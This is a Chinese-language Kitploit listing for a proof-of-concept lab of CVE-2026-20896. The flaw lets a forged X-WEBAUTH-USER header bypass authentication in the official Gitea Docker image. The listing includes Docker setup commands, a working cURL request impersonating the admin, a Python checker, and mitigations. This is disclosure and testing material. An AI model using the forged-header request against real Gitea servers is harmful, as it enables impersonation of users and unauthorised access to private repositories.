Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-20896 — 演示 CVE-2026-20896 的概念验证实验环境及 Python/cURL 脚本,该漏洞通过 X-WEBAUTH-USER 请求头绕过官方 Gitea Docker 镜像的身份验证。 | Kitploit
工具/GitHubGitHub/yym8538/cve-2026-20896
容器安全漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试身份验证实验室与实践
GitHubyym8538/cve-2026-20896

CVE-2026-20896

演示 CVE-2026-20896 的概念验证实验环境及 Python/cURL 脚本,该漏洞通过 X-WEBAUTH-USER 请求头绕过官方 Gitea Docker 镜像的身份验证。

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-20896:Gitea Docker 镜像身份验证绕过 PoC

[!WARNING] 仅在本地实验环境中,或针对您明确获授权测试的系统使用此 PoC。

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

概述

CVE-2026-20896 是受影响官方 Gitea Docker 镜像中的一个身份验证绕过漏洞。当启用反向代理身份验证时,镜像生成的 REVERSE_PROXY_TRUSTED_PROXIES = * 设置允许能够访问 Gitea 后端的客户端通过 X-WEBAUTH-USER 请求头冒充现有用户。

该实验环境会创建一个名为 gitea-admin 的管理员账户,并为其设置随机密码,同时在私有仓库 gitea-admin/private-proof 中存储 CVE-2026-20896_AUTH_BYPASS_CONFIRMED。在不知道随机管理员密码的情况下读取该文件,即可证明绕过成功。

受影响版本

类别版本
受影响官方 gitea/gitea Docker 镜像 ≤ 1.26.2
首个修复版本1.26.3
推荐版本1.26.4 或更高

该易受攻击的配置要求启用反向代理身份验证,并且 Gitea 后端可直接访问,或者上游代理会保留攻击者提供的身份请求头。本次本地复现不需要反向代理容器。

环境

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

等待几秒钟,让 Gitea 和私有证明仓库完成初始化。

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

成功利用后会返回 CVE-2026-20896_AUTH_BYPASS_CONFIRMED。

Python

python poc.py http://127.0.0.1:3000

该脚本会比较未认证请求、非管理员请求和伪造的管理员请求,并在确认存在授权绕过时打印 VULNERABLE。它需要 Python 3.10 或更高版本,且仅使用标准库。

影响

  • 冒充已知或可猜测的 Gitea 用户
  • 未经授权访问私有仓库和用户资源
  • 在冒充管理员账户时执行管理操作

缓解措施

  • 升级到 Gitea 1.26.3 或更高版本;推荐 1.26.4 或更高版本。
  • 将 REVERSE_PROXY_TRUSTED_PROXIES 限制为受信任的代理地址。
  • 阻止对 Gitea 后端的直接访问,并覆盖外部提供的身份请求头。
  • 在不需要时禁用反向代理身份验证。

清理

docker stop cve-2026-20896-gitea-vuln

参考资料

  • Gitea 安全公告 GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 和 1.26.4 发布公告
  • Gitea 安全修复 PR #38151
下载工具